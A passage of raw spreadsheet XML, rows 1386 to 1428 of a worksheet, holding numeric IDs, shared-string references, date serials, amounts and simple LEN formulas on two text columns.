        <v>13</v>
      </c>
      <c r="F1386" t="s">
        <v>10274</v>
      </c>
      <c r="G1386" s="1">
        <v>43998</v>
      </c>
      <c r="H1386">
        <v>1000</v>
      </c>
      <c r="I1386" t="s">
        <v>10829</v>
      </c>
      <c r="K1386">
        <f>LEN(I1386)</f>
        <v>57</v>
      </c>
      <c r="L1386">
        <f>LEN(J1386)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1387" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1387">
        <v>21335</v>
      </c>
      <c r="B1387">
        <v>4798</v>
      </c>
      <c r="C1387" t="s">
        <v>7183</v>
      </c>
      <c r="D1387" t="s">
        <v>11310</v>
      </c>
      <c r="E1387">
        <v>11</v>
      </c>
      <c r="F1387" t="s">
        <v>9925</v>
      </c>
      <c r="G1387" s="1">
        <v>44034</v>
      </c>
      <c r="H1387">
        <v>1000</v>
      </c>
      <c r="I1387" t="s">
        <v>11318</v>
      </c>
      <c r="K1387">
        <f>LEN(I1387)</f>
        <v>57</v>
      </c>
      <c r="L1387">
        <f>LEN(J1387)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1388" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1388">
        <v>19259</v>
      </c>
      <c r="B1388">
        <v>433</v>
      </c>
      <c r="C1388" t="s">
        <v>206</v>
      </c>
      <c r="D1388" t="s">
        <v>9878</v>
      </c>
      <c r="E1388">
        <v>16</v>
      </c>
      <c r="F1388" t="s">
        <v>9881</v>
      </c>
      <c r="G1388" s="1">
        <v>43929</v>
      </c>
      <c r="H1388">
        <v>15000</v>
      </c>
      <c r="I1388" t="s">
        <v>9882</v>
      </c>
      <c r="K1388">
        <f>LEN(I1388)</f>
        <v>56</v>
      </c>
      <c r="L1388">
        <f>LEN(J1388)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1389" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1389">
        <v>19414</v>
      </c>
      <c r="B1389">
        <v>1178</v>
      </c>
      <c r="C1389" t="s">
        <v>2668</v>
      </c>
      <c r="D1389" t="s">
        <v>10013</v>
      </c>
      <c r="E1389">
        <v>26</v>
      </c>
      <c r="F1389" t="s">
        <v>10021</v>
      </c>
      <c r="G1389" s="1">
        <v>43875</v>
      </c>
      <c r="H1389">
        <v>1000</v>
      </c>
      <c r="I1389" t="s">
        <v>10014</v>
      </c>
      <c r="K1389">
        <f>LEN(I1389)</f>
        <v>56</v>
      </c>
      <c r="L1389">
        <f>LEN(J1389)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1390" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1390">
        <v>19415</v>
      </c>
      <c r="B1390">
        <v>1178</v>
      </c>
      <c r="C1390" t="s">
        <v>2668</v>
      </c>
      <c r="D1390" t="s">
        <v>10013</v>
      </c>
      <c r="E1390">
        <v>26</v>
      </c>
      <c r="F1390" t="s">
        <v>10022</v>
      </c>
      <c r="G1390" s="1">
        <v>43875</v>
      </c>
      <c r="H1390">
        <v>500</v>
      </c>
      <c r="I1390" t="s">
        <v>10014</v>
      </c>
      <c r="K1390">
        <f>LEN(I1390)</f>
        <v>56</v>
      </c>
      <c r="L1390">
        <f>LEN(J1390)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1391" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1391">
        <v>21374</v>
      </c>
      <c r="B1391">
        <v>469</v>
      </c>
      <c r="C1391" t="s">
        <v>1626</v>
      </c>
      <c r="D1391" t="s">
        <v>11336</v>
      </c>
      <c r="E1391">
        <v>12</v>
      </c>
      <c r="F1391" t="s">
        <v>9497</v>
      </c>
      <c r="G1391" s="1">
        <v>44075</v>
      </c>
      <c r="H1391">
        <v>20</v>
      </c>
      <c r="I1391" t="s">
        <v>11340</v>
      </c>
      <c r="K1391">
        <f>LEN(I1391)</f>
        <v>54</v>
      </c>
      <c r="L1391">
        <f>LEN(J1391)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1392" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1392">
        <v>21375</v>
      </c>
      <c r="B1392">
        <v>469</v>
      </c>
      <c r="C1392" t="s">
        <v>1626</v>
      </c>
      <c r="D1392" t="s">
        <v>11336</v>
      </c>
      <c r="E1392">
        <v>12</v>
      </c>
      <c r="F1392" t="s">
        <v>3499</v>
      </c>
      <c r="G1392" s="1">
        <v>44075</v>
      </c>
      <c r="H1392">
        <v>10</v>
      </c>
      <c r="I1392" t="s">
        <v>11340</v>
      </c>
      <c r="K1392">
        <f>LEN(I1392)</f>
        <v>54</v>
      </c>
      <c r="L1392">
        <f>LEN(J1392)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1393" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1393">
        <v>19349</v>
      </c>
      <c r="B1393">
        <v>2538</v>
      </c>
      <c r="C1393" t="s">
        <v>4142</v>
      </c>
      <c r="D1393" t="s">
        <v>9601</v>
      </c>
      <c r="E1393">
        <v>2</v>
      </c>
      <c r="F1393" t="s">
        <v>9944</v>
      </c>
      <c r="G1393" s="1">
        <v>43896</v>
      </c>
      <c r="H1393">
        <v>200</v>
      </c>
      <c r="I1393" t="s">
        <v>9945</v>
      </c>
      <c r="K1393">
        <f>LEN(I1393)</f>
        <v>52</v>
      </c>
      <c r="L1393">
        <f>LEN(J1393)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1394" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1394">
        <v>20848</v>
      </c>
      <c r="B1394">
        <v>538</v>
      </c>
      <c r="C1394" t="s">
        <v>824</v>
      </c>
      <c r="D1394" t="s">
        <v>11032</v>
      </c>
      <c r="E1394">
        <v>11</v>
      </c>
      <c r="F1394" t="s">
        <v>11033</v>
      </c>
      <c r="G1394" s="1">
        <v>44012</v>
      </c>
      <c r="H1394">
        <v>32500</v>
      </c>
      <c r="I1394" t="s">
        <v>11034</v>
      </c>
      <c r="K1394">
        <f>LEN(I1394)</f>
        <v>52</v>
      </c>
      <c r="L1394">
        <f>LEN(J1394)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1395" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1395">
        <v>20851</v>
      </c>
      <c r="B1395">
        <v>538</v>
      </c>
      <c r="C1395" t="s">
        <v>824</v>
      </c>
      <c r="D1395" t="s">
        <v>11032</v>
      </c>
      <c r="E1395">
        <v>11</v>
      </c>
      <c r="F1395" t="s">
        <v>11038</v>
      </c>
      <c r="G1395" s="1">
        <v>44012</v>
      </c>
      <c r="H1395">
        <v>0</v>
      </c>
      <c r="I1395" t="s">
        <v>11034</v>
      </c>
      <c r="K1395">
        <f>LEN(I1395)</f>
        <v>52</v>
      </c>
      <c r="L1395">
        <f>LEN(J1395)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1396" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1396">
        <v>19329</v>
      </c>
      <c r="B1396">
        <v>2295</v>
      </c>
      <c r="C1396" t="s">
        <v>4913</v>
      </c>
      <c r="D1396" t="s">
        <v>9609</v>
      </c>
      <c r="E1396">
        <v>2</v>
      </c>
      <c r="F1396" t="s">
        <v>9925</v>
      </c>
      <c r="G1396" s="1">
        <v>43900</v>
      </c>
      <c r="H1396">
        <v>20000</v>
      </c>
      <c r="I1396" t="s">
        <v>9926</v>
      </c>
      <c r="K1396">
        <f>LEN(I1396)</f>
        <v>50</v>
      </c>
      <c r="L1396">
        <f>LEN(J1396)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1397" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1397">
        <v>19345</v>
      </c>
      <c r="B1397">
        <v>2295</v>
      </c>
      <c r="C1397" t="s">
        <v>4913</v>
      </c>
      <c r="D1397" t="s">
        <v>9609</v>
      </c>
      <c r="E1397">
        <v>2</v>
      </c>
      <c r="F1397" t="s">
        <v>9941</v>
      </c>
      <c r="G1397" s="1">
        <v>43900</v>
      </c>
      <c r="H1397">
        <v>50000</v>
      </c>
      <c r="I1397" t="s">
        <v>9926</v>
      </c>
      <c r="K1397">
        <f>LEN(I1397)</f>
        <v>50</v>
      </c>
      <c r="L1397">
        <f>LEN(J1397)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1398" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1398">
        <v>19459</v>
      </c>
      <c r="B1398">
        <v>159</v>
      </c>
      <c r="C1398" t="s">
        <v>109</v>
      </c>
      <c r="D1398" t="s">
        <v>9524</v>
      </c>
      <c r="E1398">
        <v>12</v>
      </c>
      <c r="F1398" t="s">
        <v>9925</v>
      </c>
      <c r="G1398" s="1">
        <v>43896</v>
      </c>
      <c r="H1398">
        <v>0</v>
      </c>
      <c r="I1398" t="s">
        <v>9525</v>
      </c>
      <c r="K1398">
        <f>LEN(I1398)</f>
        <v>48</v>
      </c>
      <c r="L1398">
        <f>LEN(J1398)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1399" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1399">
        <v>19460</v>
      </c>
      <c r="B1399">
        <v>159</v>
      </c>
      <c r="C1399" t="s">
        <v>109</v>
      </c>
      <c r="D1399" t="s">
        <v>9524</v>
      </c>
      <c r="E1399">
        <v>12</v>
      </c>
      <c r="F1399" t="s">
        <v>7296</v>
      </c>
      <c r="G1399" s="1">
        <v>43896</v>
      </c>
      <c r="H1399">
        <v>0</v>
      </c>
      <c r="I1399" t="s">
        <v>9525</v>
      </c>
      <c r="K1399">
        <f>LEN(I1399)</f>
        <v>48</v>
      </c>
      <c r="L1399">
        <f>LEN(J1399)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1400" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1400">
        <v>19461</v>
      </c>
      <c r="B1400">
        <v>159</v>
      </c>
      <c r="C1400" t="s">
        <v>109</v>
      </c>
      <c r="D1400" t="s">
        <v>9524</v>
      </c>
      <c r="E1400">
        <v>12</v>
      </c>
      <c r="F1400" t="s">
        <v>10062</v>
      </c>
      <c r="G1400" s="1">
        <v>43896</v>
      </c>
      <c r="H1400">
        <v>0</v>
      </c>
      <c r="I1400" t="s">
        <v>9525</v>
      </c>
      <c r="K1400">
        <f>LEN(I1400)</f>
        <v>48</v>
      </c>
      <c r="L1400">
        <f>LEN(J1400)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1401" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1401">
        <v>20193</v>
      </c>
      <c r="B1401">
        <v>302</v>
      </c>
      <c r="C1401" t="s">
        <v>16377</v>
      </c>
      <c r="D1401" t="s">
        <v>16378</v>
      </c>
      <c r="E1401">
        <v>27</v>
      </c>
      <c r="F1401" t="s">
        <v>10536</v>
      </c>
      <c r="G1401" s="1">
        <v>43962</v>
      </c>
      <c r="H1401" s="4">
        <v>900000</v>
      </c>
      <c r="I1401" t="s">
        <v>10334</v>
      </c>
      <c r="K1401">
        <f>LEN(I1401)</f>
        <v>48</v>
      </c>
      <c r="L1401">
        <f>LEN(J1401)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1402" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1402">
        <v>20274</v>
      </c>
      <c r="B1402">
        <v>2711</v>
      </c>
      <c r="C1402" t="s">
        <v>6854</v>
      </c>
      <c r="D1402" t="s">
        <v>10590</v>
      </c>
      <c r="E1402">
        <v>29</v>
      </c>
      <c r="F1402" t="s">
        <v>10591</v>
      </c>
      <c r="G1402" s="1">
        <v>43935</v>
      </c>
      <c r="H1402">
        <v>20000</v>
      </c>
      <c r="I1402" t="s">
        <v>9698</v>
      </c>
      <c r="K1402">
        <f>LEN(I1402)</f>
        <v>48</v>
      </c>
      <c r="L1402">
        <f>LEN(J1402)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1403" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1403">
        <v>20399</v>
      </c>
      <c r="B1403">
        <v>159</v>
      </c>
      <c r="C1403" t="s">
        <v>109</v>
      </c>
      <c r="D1403" t="s">
        <v>10687</v>
      </c>
      <c r="E1403">
        <v>12</v>
      </c>
      <c r="F1403" t="s">
        <v>7746</v>
      </c>
      <c r="G1403" s="1">
        <v>43907</v>
      </c>
      <c r="H1403">
        <v>0</v>
      </c>
      <c r="I1403" t="s">
        <v>9525</v>
      </c>
      <c r="K1403">
        <f>LEN(I1403)</f>
        <v>48</v>
      </c>
      <c r="L1403">
        <f>LEN(J1403)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1404" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1404">
        <v>20401</v>
      </c>
      <c r="B1404">
        <v>159</v>
      </c>
      <c r="C1404" t="s">
        <v>109</v>
      </c>
      <c r="D1404" t="s">
        <v>10687</v>
      </c>
      <c r="E1404">
        <v>12</v>
      </c>
      <c r="F1404" t="s">
        <v>10688</v>
      </c>
      <c r="G1404" s="1">
        <v>43907</v>
      </c>
      <c r="H1404">
        <v>0</v>
      </c>
      <c r="I1404" t="s">
        <v>9525</v>
      </c>
      <c r="K1404">
        <f>LEN(I1404)</f>
        <v>48</v>
      </c>
      <c r="L1404">
        <f>LEN(J1404)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1405" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1405">
        <v>20406</v>
      </c>
      <c r="B1405">
        <v>159</v>
      </c>
      <c r="C1405" t="s">
        <v>109</v>
      </c>
      <c r="D1405" t="s">
        <v>10687</v>
      </c>
      <c r="E1405">
        <v>12</v>
      </c>
      <c r="F1405" t="s">
        <v>10690</v>
      </c>
      <c r="G1405" s="1">
        <v>43907</v>
      </c>
      <c r="H1405">
        <v>0</v>
      </c>
      <c r="I1405" t="s">
        <v>9525</v>
      </c>
      <c r="K1405">
        <f>LEN(I1405)</f>
        <v>48</v>
      </c>
      <c r="L1405">
        <f>LEN(J1405)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1406" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1406">
        <v>20019</v>
      </c>
      <c r="B1406">
        <v>305</v>
      </c>
      <c r="C1406" t="s">
        <v>651</v>
      </c>
      <c r="D1406" t="s">
        <v>10400</v>
      </c>
      <c r="E1406">
        <v>12</v>
      </c>
      <c r="F1406" t="s">
        <v>653</v>
      </c>
      <c r="G1406" s="1">
        <v>44021</v>
      </c>
      <c r="H1406">
        <v>8000</v>
      </c>
      <c r="I1406" t="s">
        <v>9841</v>
      </c>
      <c r="K1406">
        <f>LEN(I1406)</f>
        <v>47</v>
      </c>
      <c r="L1406">
        <f>LEN(J1406)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1407" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1407">
        <v>19897</v>
      </c>
      <c r="B1407">
        <v>2572</v>
      </c>
      <c r="C1407" t="s">
        <v>5382</v>
      </c>
      <c r="D1407" t="s">
        <v>9735</v>
      </c>
      <c r="E1407">
        <v>11</v>
      </c>
      <c r="F1407" t="s">
        <v>3318</v>
      </c>
      <c r="G1407" s="1">
        <v>44018</v>
      </c>
      <c r="H1407">
        <v>0</v>
      </c>
      <c r="I1407" t="s">
        <v>10310</v>
      </c>
      <c r="K1407">
        <f>LEN(I1407)</f>
        <v>46</v>
      </c>
      <c r="L1407">
        <f>LEN(J1407)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1408" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1408">
        <v>20290</v>
      </c>
      <c r="B1408">
        <v>578</v>
      </c>
      <c r="C1408" t="s">
        <v>871</v>
      </c>
      <c r="D1408" t="s">
        <v>10605</v>
      </c>
      <c r="E1408">
        <v>28</v>
      </c>
      <c r="F1408" t="s">
        <v>2236</v>
      </c>
      <c r="G1408" s="1">
        <v>43959</v>
      </c>
      <c r="H1408">
        <v>25000</v>
      </c>
      <c r="I1408" t="s">
        <v>10606</v>
      </c>
      <c r="K1408">
        <f>LEN(I1408)</f>
        <v>46</v>
      </c>
      <c r="L1408">
        <f>LEN(J1408)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1409" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1409">
        <v>19295</v>
      </c>
      <c r="B1409">
        <v>2525</v>
      </c>
      <c r="C1409" t="s">
        <v>2621</v>
      </c>
      <c r="D1409" t="s">
        <v>9897</v>
      </c>
      <c r="E1409">
        <v>31</v>
      </c>
      <c r="F1409" t="s">
        <v>9901</v>
      </c>
      <c r="G1409" s="1">
        <v>43847</v>
      </c>
      <c r="H1409">
        <v>0</v>
      </c>
      <c r="I1409" t="s">
        <v>9902</v>
      </c>
      <c r="K1409">
        <f>LEN(I1409)</f>
        <v>45</v>
      </c>
      <c r="L1409">
        <f>LEN(J1409)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1410" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1410">
        <v>19383</v>
      </c>
      <c r="B1410">
        <v>2554</v>
      </c>
      <c r="C1410" t="s">
        <v>5016</v>
      </c>
      <c r="D1410" t="s">
        <v>9979</v>
      </c>
      <c r="E1410">
        <v>31</v>
      </c>
      <c r="F1410" t="s">
        <v>9980</v>
      </c>
      <c r="G1410" s="1">
        <v>43854</v>
      </c>
      <c r="H1410">
        <v>20000</v>
      </c>
      <c r="I1410" t="s">
        <v>9981</v>
      </c>
      <c r="K1410">
        <f>LEN(I1410)</f>
        <v>45</v>
      </c>
      <c r="L1410">
        <f>LEN(J1410)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1411" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1411">
        <v>20601</v>
      </c>
      <c r="B1411">
        <v>458</v>
      </c>
      <c r="C1411" t="s">
        <v>1095</v>
      </c>
      <c r="D1411" t="s">
        <v>10839</v>
      </c>
      <c r="E1411">
        <v>31</v>
      </c>
      <c r="F1411" t="s">
        <v>10840</v>
      </c>
      <c r="G1411" s="1">
        <v>44118</v>
      </c>
      <c r="H1411">
        <v>113460</v>
      </c>
      <c r="I1411" t="s">
        <v>10841</v>
      </c>
      <c r="K1411">
        <f>LEN(I1411)</f>
        <v>45</v>
      </c>
      <c r="L1411">
        <f>LEN(J1411)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1412" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1412">
        <v>21087</v>
      </c>
      <c r="B1412">
        <v>711</v>
      </c>
      <c r="C1412" t="s">
        <v>1511</v>
      </c>
      <c r="D1412" t="s">
        <v>11126</v>
      </c>
      <c r="E1412">
        <v>23</v>
      </c>
      <c r="F1412" t="s">
        <v>1403</v>
      </c>
      <c r="G1412" s="1">
        <v>44068</v>
      </c>
      <c r="H1412">
        <v>360</v>
      </c>
      <c r="I1412" t="s">
        <v>11127</v>
      </c>
      <c r="K1412">
        <f>LEN(I1412)</f>
        <v>45</v>
      </c>
      <c r="L1412">
        <f>LEN(J1412)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1413" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1413">
        <v>21239</v>
      </c>
      <c r="B1413">
        <v>1155</v>
      </c>
      <c r="C1413" t="s">
        <v>16325</v>
      </c>
      <c r="D1413" t="s">
        <v>16379</v>
      </c>
      <c r="E1413">
        <v>10</v>
      </c>
      <c r="F1413" t="s">
        <v>11235</v>
      </c>
      <c r="G1413" s="1">
        <v>44022</v>
      </c>
      <c r="H1413">
        <v>1463386.5</v>
      </c>
      <c r="I1413" t="s">
        <v>11236</v>
      </c>
      <c r="K1413">
        <f>LEN(I1413)</f>
        <v>45</v>
      </c>
      <c r="L1413">
        <f>LEN(J1413)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1414" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1414">
        <v>17208</v>
      </c>
      <c r="B1414">
        <v>2239</v>
      </c>
      <c r="C1414" t="s">
        <v>6191</v>
      </c>
      <c r="D1414" t="s">
        <v>9727</v>
      </c>
      <c r="E1414">
        <v>29</v>
      </c>
      <c r="F1414" t="s">
        <v>945</v>
      </c>
      <c r="G1414" s="1">
        <v>43865</v>
      </c>
      <c r="H1414">
        <v>51000</v>
      </c>
      <c r="I1414" t="s">
        <v>9729</v>
      </c>
      <c r="K1414">
        <f>LEN(I1414)</f>
        <v>44</v>
      </c>
      <c r="L1414">
        <f>LEN(J1414)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1415" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1415">
        <v>19413</v>
      </c>
      <c r="B1415">
        <v>1178</v>
      </c>
      <c r="C1415" t="s">
        <v>2668</v>
      </c>
      <c r="D1415" t="s">
        <v>10013</v>
      </c>
      <c r="E1415">
        <v>26</v>
      </c>
      <c r="F1415" t="s">
        <v>10019</v>
      </c>
      <c r="G1415" s="1">
        <v>43875</v>
      </c>
      <c r="H1415">
        <v>5000</v>
      </c>
      <c r="I1415" t="s">
        <v>10020</v>
      </c>
      <c r="K1415">
        <f>LEN(I1415)</f>
        <v>42</v>
      </c>
      <c r="L1415">
        <f>LEN(J1415)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1416" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1416">
        <v>19792</v>
      </c>
      <c r="B1416">
        <v>2594</v>
      </c>
      <c r="C1416" t="s">
        <v>5322</v>
      </c>
      <c r="D1416" t="s">
        <v>10233</v>
      </c>
      <c r="E1416">
        <v>5</v>
      </c>
      <c r="F1416" t="s">
        <v>10234</v>
      </c>
      <c r="G1416" s="1">
        <v>43879</v>
      </c>
      <c r="H1416">
        <v>160000</v>
      </c>
      <c r="I1416" t="s">
        <v>10235</v>
      </c>
      <c r="K1416">
        <f>LEN(I1416)</f>
        <v>42</v>
      </c>
      <c r="L1416">
        <f>LEN(J1416)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1417" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1417">
        <v>19954</v>
      </c>
      <c r="B1417">
        <v>2594</v>
      </c>
      <c r="C1417" t="s">
        <v>5322</v>
      </c>
      <c r="D1417" t="s">
        <v>10233</v>
      </c>
      <c r="E1417">
        <v>5</v>
      </c>
      <c r="F1417" t="s">
        <v>9992</v>
      </c>
      <c r="G1417" s="1">
        <v>43879</v>
      </c>
      <c r="H1417">
        <v>12000</v>
      </c>
      <c r="I1417" t="s">
        <v>10235</v>
      </c>
      <c r="K1417">
        <f>LEN(I1417)</f>
        <v>42</v>
      </c>
      <c r="L1417">
        <f>LEN(J1417)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1418" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1418">
        <v>20711</v>
      </c>
      <c r="B1418">
        <v>2250</v>
      </c>
      <c r="C1418" t="s">
        <v>5879</v>
      </c>
      <c r="D1418" t="s">
        <v>10911</v>
      </c>
      <c r="E1418">
        <v>7</v>
      </c>
      <c r="F1418" t="s">
        <v>3673</v>
      </c>
      <c r="G1418" s="1">
        <v>44272</v>
      </c>
      <c r="H1418">
        <v>140</v>
      </c>
      <c r="I1418" t="s">
        <v>10914</v>
      </c>
      <c r="K1418">
        <f>LEN(I1418)</f>
        <v>42</v>
      </c>
      <c r="L1418">
        <f>LEN(J1418)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1419" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1419">
        <v>17272</v>
      </c>
      <c r="B1419">
        <v>20</v>
      </c>
      <c r="C1419" t="s">
        <v>1806</v>
      </c>
      <c r="D1419" t="s">
        <v>9605</v>
      </c>
      <c r="E1419">
        <v>22</v>
      </c>
      <c r="F1419" t="s">
        <v>9754</v>
      </c>
      <c r="G1419" s="1">
        <v>44351</v>
      </c>
      <c r="H1419">
        <v>12000</v>
      </c>
      <c r="I1419" t="s">
        <v>9755</v>
      </c>
      <c r="K1419">
        <f>LEN(I1419)</f>
        <v>40</v>
      </c>
      <c r="L1419">
        <f>LEN(J1419)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1420" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1420">
        <v>17273</v>
      </c>
      <c r="B1420">
        <v>20</v>
      </c>
      <c r="C1420" t="s">
        <v>1806</v>
      </c>
      <c r="D1420" t="s">
        <v>9605</v>
      </c>
      <c r="E1420">
        <v>22</v>
      </c>
      <c r="F1420" t="s">
        <v>9756</v>
      </c>
      <c r="G1420" s="1">
        <v>44351</v>
      </c>
      <c r="H1420">
        <v>12000</v>
      </c>
      <c r="I1420" t="s">
        <v>9755</v>
      </c>
      <c r="K1420">
        <f>LEN(I1420)</f>
        <v>40</v>
      </c>
      <c r="L1420">
        <f>LEN(J1420)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1421" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1421">
        <v>19694</v>
      </c>
      <c r="B1421">
        <v>1701</v>
      </c>
      <c r="C1421" t="s">
        <v>2751</v>
      </c>
      <c r="D1421" t="s">
        <v>10181</v>
      </c>
      <c r="E1421">
        <v>15</v>
      </c>
      <c r="F1421" t="s">
        <v>10182</v>
      </c>
      <c r="G1421" s="1">
        <v>43893</v>
      </c>
      <c r="H1421">
        <v>432</v>
      </c>
      <c r="I1421" t="s">
        <v>10183</v>
      </c>
      <c r="K1421">
        <f>LEN(I1421)</f>
        <v>39</v>
      </c>
      <c r="L1421">
        <f>LEN(J1421)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1422" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1422">
        <v>19698</v>
      </c>
      <c r="B1422">
        <v>1701</v>
      </c>
      <c r="C1422" t="s">
        <v>2751</v>
      </c>
      <c r="D1422" t="s">
        <v>10181</v>
      </c>
      <c r="E1422">
        <v>15</v>
      </c>
      <c r="F1422" t="s">
        <v>10184</v>
      </c>
      <c r="G1422" s="1">
        <v>43893</v>
      </c>
      <c r="H1422">
        <v>720</v>
      </c>
      <c r="I1422" t="s">
        <v>10183</v>
      </c>
      <c r="K1422">
        <f>LEN(I1422)</f>
        <v>39</v>
      </c>
      <c r="L1422">
        <f>LEN(J1422)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1423" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1423">
        <v>19699</v>
      </c>
      <c r="B1423">
        <v>1701</v>
      </c>
      <c r="C1423" t="s">
        <v>2751</v>
      </c>
      <c r="D1423" t="s">
        <v>16380</v>
      </c>
      <c r="E1423">
        <v>15</v>
      </c>
      <c r="F1423" t="s">
        <v>3341</v>
      </c>
      <c r="G1423" s="1">
        <v>43893</v>
      </c>
      <c r="H1423" s="3" t="s">
        <v>16249</v>
      </c>
      <c r="I1423" t="s">
        <v>10183</v>
      </c>
      <c r="K1423">
        <f>LEN(I1423)</f>
        <v>39</v>
      </c>
      <c r="L1423">
        <f>LEN(J1423)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1424" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1424">
        <v>19700</v>
      </c>
      <c r="B1424">
        <v>1701</v>
      </c>
      <c r="C1424" t="s">
        <v>2751</v>
      </c>
      <c r="D1424" t="s">
        <v>10181</v>
      </c>
      <c r="E1424">
        <v>15</v>
      </c>
      <c r="F1424" t="s">
        <v>10185</v>
      </c>
      <c r="G1424" s="1">
        <v>43893</v>
      </c>
      <c r="H1424">
        <v>144</v>
      </c>
      <c r="I1424" t="s">
        <v>10183</v>
      </c>
      <c r="K1424">
        <f>LEN(I1424)</f>
        <v>39</v>
      </c>
      <c r="L1424">
        <f>LEN(J1424)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1425" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1425">
        <v>20315</v>
      </c>
      <c r="B1425">
        <v>482</v>
      </c>
      <c r="C1425" t="s">
        <v>863</v>
      </c>
      <c r="D1425" t="s">
        <v>10620</v>
      </c>
      <c r="E1425">
        <v>6</v>
      </c>
      <c r="F1425" t="s">
        <v>9681</v>
      </c>
      <c r="G1425" s="1">
        <v>43927</v>
      </c>
      <c r="H1425">
        <v>1100</v>
      </c>
      <c r="I1425" t="s">
        <v>10621</v>
      </c>
      <c r="K1425">
        <f>LEN(I1425)</f>
        <v>39</v>
      </c>
      <c r="L1425">
        <f>LEN(J1425)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1426" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1426">
        <v>21332</v>
      </c>
      <c r="B1426">
        <v>4798</v>
      </c>
      <c r="C1426" t="s">
        <v>7183</v>
      </c>
      <c r="D1426" t="s">
        <v>11310</v>
      </c>
      <c r="E1426">
        <v>11</v>
      </c>
      <c r="F1426" t="s">
        <v>10347</v>
      </c>
      <c r="G1426" s="1">
        <v>44034</v>
      </c>
      <c r="H1426">
        <v>1000</v>
      </c>
      <c r="I1426" t="s">
        <v>10771</v>
      </c>
      <c r="K1426">
        <f>LEN(I1426)</f>
        <v>38</v>
      </c>
      <c r="L1426">
        <f>LEN(J1426)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1427" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1427">
        <v>17264</v>
      </c>
      <c r="B1427">
        <v>2268</v>
      </c>
      <c r="C1427" t="s">
        <v>6789</v>
      </c>
      <c r="D1427" t="s">
        <v>9745</v>
      </c>
      <c r="E1427">
        <v>18</v>
      </c>
      <c r="F1427" t="s">
        <v>9747</v>
      </c>
      <c r="G1427" s="1">
        <v>43853</v>
      </c>
      <c r="H1427">
        <v>300000</v>
      </c>
      <c r="I1427" t="s">
        <v>9748</v>
      </c>
      <c r="K1427">
        <f>LEN(I1427)</f>
        <v>35</v>
      </c>
      <c r="L1427">
        <f>LEN(J1427)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1428" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1428">
        <v>17265</v>
      </c>
